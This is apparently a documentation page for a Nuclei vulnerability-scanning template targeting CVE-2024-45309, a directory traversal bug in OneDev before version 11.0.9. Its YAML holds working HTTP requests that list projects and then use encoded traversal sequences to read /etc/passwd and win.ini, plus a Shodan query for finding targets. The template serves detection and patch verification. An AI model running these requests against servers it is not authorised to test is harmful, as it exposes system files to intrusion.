Skip to content
Nuclei Templates

OneDev.io < 11.0.9 - Arbitrary File Read

ID: CVE-2024-45309

Severity: high

Author: isacaya

Tags: cve,cve2024,lfi,onedev

Description

Section titled “Description”

Files on the host computer can be accessed by directory traversal.

YAML Source

Section titled “YAML Source”
id: CVE-2024-45309


info:
  name: OneDev.io < 11.0.9 - Arbitrary File Read
  author: isacaya
  severity: high
  description: |
    Files on the host computer can be accessed by directory traversal.
  impact: |
    An attacker would be able to view the contents of a file on the computer.
  remediation: |
    Update to version 11.0.9.
  reference:
    - https://x.com/Siebene7/status/1848727539046617324
    - https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45309
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45309
    cwe-id: CWE-22
    cpe: cpe:2.3:a:onedev_project:onedev:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: onedev
    shodan-query: html:"onedev.io"
    product: onedev
    framework: java
  tags: cve,cve2024,lfi,onedev


flow: |
  http(1)
  for (let projectName of iterate(template.project)) {
    set("project", projectName)
    http(2)
  }


http:
  - raw:
      - |
        GET /~projects HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "onedev")'
        internal: true


    extractors:
      - type: regex
        part: body
        name: project
        group: 3
        regex:
          - '<a class="mr-([0-9]+)" id="([a-z0-9]+)" href="(.*)">'
        internal: true


  - raw:
      - |
        GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
        Host: {{Hostname}}


    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'root:.*:0:0:'
          - '\\[(font|extension|file)s\\]'
        condition: or


      - type: word
        part: header
        words:
          - 'filename='
          - 'application/octet-stream'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f357cc5b61dc601e595f36d832090b5cb170c405ab8f8fc9ff8d4e02e0019163022072d153376a9d3e94ab8287bbd8c13d25e93794b03869c6a291bea4544cf81278:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-45309.yaml"

View on Github